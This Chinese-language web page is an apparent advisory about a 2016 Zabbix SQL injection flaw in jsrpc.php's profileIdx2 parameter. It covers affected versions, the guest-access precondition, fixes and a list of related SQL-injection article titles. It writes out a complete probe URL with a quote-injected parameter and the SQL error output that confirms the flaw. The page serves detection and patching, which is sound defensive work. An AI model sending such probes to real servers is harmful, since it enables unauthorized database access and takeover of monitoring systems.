zabbix再現高危SQL注入漏洞,可獲作業系統許可權
一、漏洞基本資訊
CVE編號:暫無漏洞名稱:zabbix再現高危SQL注入漏洞
漏洞釋出日期:2016.08.17
受影響的軟體及系統:2.2.x,3.0.0-3.0.3
漏洞概述:zabbix的jsrpc的profileIdx2引數存在insert方式的SQL注入漏洞,攻擊者無需授權登陸即可登陸zabbix管理系統,也可通過script等功能輕易直接獲取zabbix伺服器的作業系統許可權。
二、漏洞原理分析
zabbix是一個開源的企業級效能監控解決方案。近日,zabbix的jsrpc的profileIdx2引數存在insert方式的SQL注入漏洞,攻擊者無需授權登陸即可登陸zabbix管理系統,也可通過script等功能輕易直接獲取zabbix伺服器的作業系統許可權。 但是無需登入注入這裡有個前提,就是zabbix開啟了guest許可權。而在zabbix中,guest的預設密碼為空。需要有這個條件的支援才可以進行無許可權注入。三、漏洞檢測方法
1、手動直接檢測1:
在zabbix的地址後面加上如下url: /jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=12、
手動直接檢測1:
在zabbix的地址後面加上如下url:
如果出現下列程式碼則證明漏洞存在 SQL (0.000361):INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES(88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1) latest.php:746 →require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in/home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
3、使用工具直接檢測3:
連結: http://pan.baidu.com/s/1dFcABxZ 密碼: 6pkf
4、線上檢測:
https://www.vulbox.com/lab
https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?service_id=1026
四、漏洞修復方案
版本升級
打補丁
關閉guest
五、漏洞修復結果驗證
1、手動直接檢測1:
2、手動直接檢測1:
3、使用工具直接檢測3
歡迎大家分享更好的思路,熱切期待^^_^^ !
相關推薦
zabbix再現高危SQL注入漏洞,可獲作業系統許可權
一、漏洞基本資訊 CVE編號:暫無漏洞名稱:zabbix再現高危SQL注入漏洞漏洞釋出日期:2016.08.17受影響的軟體及系統:2.2.x,3.0.0-3.0.3漏洞概述:zabbix的jsrp
SQL注入漏洞,攻防必殺技!
SQL注入是常見的利用程式漏洞進行攻擊的方法,是很多入門級“黑客”喜歡採用的攻擊方式,近來網上對它的討論很熱烈,所以我在本期專題中為讀者揭示SQL攻擊的主要原理以及如何防範這種攻擊。攻擊源於程式漏洞 SQL注入原理導致SQL注入攻擊的漏洞並非系統造成的,主要是程
sql注入漏洞,應遮蔽SQL注入攻擊
注:SQL注入好比是前端URL傳引數請求時引數以SQL 做為引數傳入,如 select 1 from dual wh
Vtiger CRM 幾處SQL注入漏洞分析,測試工程師可借鑑
本文由雲+社群發表 0x00 前言 乾白盒審計有小半年了,大部分是業務上的程式碼,邏輯的複雜度和功能模組結構都比較簡單,幹久了收獲也就一般,有機會接觸一個成熟的產品(vtiger CRM)進行白盒審計,從審計的技術難度上來說,都比公司內的那些業務複雜得多,而真正要提高自己技術水平,更應該看的也是
2018-10 第一次DVWA靶機爆破SQL注入漏洞記錄(GET方法,使用SQLMAP、任意抓包工具)
首先進入DVWA,調整安全級別為low。 開啟SQL Injection頁面,ID欄輸入1 因為DVWA需要登入,所以使用Burp Suite抓包,包裡包含了cookie。 將抓包內容儲存至本地(/root/test) 開啟終端,輸入: sqlmap
【重溫基礎的SQL注入】圖文詳細解說,java後臺用mybatis框架的SQL注入漏洞和效果展示,以及預防
1. SQL注入1.1原因描述:使用者名稱和密碼的引數是直接引用,可用拼接的方式。1.2 拼接方式' or '1'='1 (這個可以作為參考原型,變種很多,百度都有)主要是拼接成這樣的SQL:效果如此:即使沒有拼接查詢張三,依然能查到資料庫的張三,因為 '
10年前,我就用 SQL注入漏洞黑了學校網站
> 我是風箏,公眾號「古時的風箏」,一個兼具深度與廣度的程式設計師鼓勵師,一個本打算寫詩卻寫起了程式碼的田園碼農! 文章會收錄在 [JavaNewBee](https://github.com/huzhicheng/JavaNewBee) 中,更有 Java 後端知識圖譜,從小白到大牛要走的路都在裡面。 標
MySQL— pymysql模組(防止sql注入),視覺化軟體Navicat
一.Pymysql import pymysql #python2.X 中是 mysqldb 和 pythonmysql 用法是一模一樣的 #pymysql可以偽裝成上面這兩個模組 user = input('username: ') pwd = input('passwo
ThinkPHP 5.1.x SQL注入漏洞分析
一、背景引見 ThinkPHP 是一個疾速、複雜的基於 MVC 和麵向物件的輕量級 PHP 開發框架,遵照 Apache2 開源協議釋出。ThinkPHP從降生以來不斷秉承簡潔適用的設計準繩,在堅持出色的功能和至簡的程式碼的同時,也注重開發體驗和易用性,為 WEB 使用和 API 開發提供了強無
JDBC預處理物件PreprareStatement,預防SQL注入問題,提高安全性
PreparedStatement介面是Statement的子介面,它直接繼承並重載了Statement的方法。 PreprareStatement預處理物件為什麼能預防SQL注入提高安全性呢? 因為SQL語句在程式執行前已經進行了預編譯,在程式執行時第一次操作資料庫之前,SQL語
SQL注入漏洞筆記
一:注入原理 SQL注入是一種常見的Web安全漏洞,攻擊者利用這個問題,可以訪問或修改資料,或者利用潛在的資料庫漏洞進行攻擊 SQL注入是一種將SQL語句插入或天機到應用(使用者)的輸入引數中的攻擊,之後再將這些引數傳遞給後臺的SQL伺服器加以解析並執行 常見的web架構 表示層 :訪問網址
PHP程式碼審計-SQL注入漏洞挖掘
SQL注入經常出現在登入頁面,HTTP頭(user-agent/client-ip/cookies等),訂單處理等地方,在發生多個互動的地方經常會發生二次注入。 普通注入 $uid = $_GET[‘id’]; $sql = “select * from user where id=$
PHP SQL注入漏洞防範
在PHP中採用魔術引號進行過濾,但是PHP5.4之後被取消了,同時在遇到int型注入也不會那麼有效,所以用的最多的還是過濾函式和類(例如discuz,dedecms,phpcms),如果單純的過濾函式寫的不嚴謹,就會出現繞過的情況,最好的解決方法還是預編譯的方式。 GPC/runtime魔術
怎麼修復網站漏洞之metinfo遠端SQL注入漏洞修補
2018年11月23日SINE網站安全檢測平臺,檢測到MetInfo最新版本爆出高危漏洞,危害性較大,影響目前MetInfo 5.3版本到最新的 MetInfo 6.1.3版本,該網站漏洞產生的主要原因是MetInfo的上傳程式碼裡的引數值沒有進行安全過濾,導致上傳路徑這裡進行偽造路徑,並可以插入惡意的程式碼
CNVD-2018-20024——MetInfo 6.1.2 SQL注入漏洞
0x00漏洞簡介 metinfo是一個cms 6.1.2版本中存在一個sql盲注漏洞 0x01漏洞細節與漏洞利用 在\app\system\message\web\message.class.php的add函式。 get_one這裡有個columnid 這個地方是傳入int型別
思科修復Prime License Manager中的關鍵SQL注入漏洞
思科剛剛修補了一個關鍵的SQL注入漏洞,該漏洞存在於Cisco Prime License Manager(PLM)的Web框架程式碼中,旨在幫助管理員在企業範圍內管理使用者許可。 在成功利用CVE-2018-15441安全問題之後,潛在的遠端攻擊者可以在脆弱的機器上執行任意SQL查詢。 根據思科在Cis
【程式碼審計】五指CMS_v4.1.0 copyfrom.php 頁面存在SQL注入漏洞分析
0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁: 0x01 程式碼
【程式碼審計】五指CMS_v4.1.0 後臺存在SQL注入漏洞分析
0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁: 0x01 程式碼
【程式碼審計】大米CMS_V5.5.3 SQL注入漏洞分析
0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  
【程式碼審計】XIAOCMS_後臺database.php頁面存在SQL注入漏洞
0x00 環境準備 XIAOCMS官網: http://www.xiaocms.com/ 網站原始碼版本:XiaoCms (釋出時間:2014-12-29) 程式原始碼下載:http://www.xiaocms.com/download/XiaoCms_20141229.zip 測試網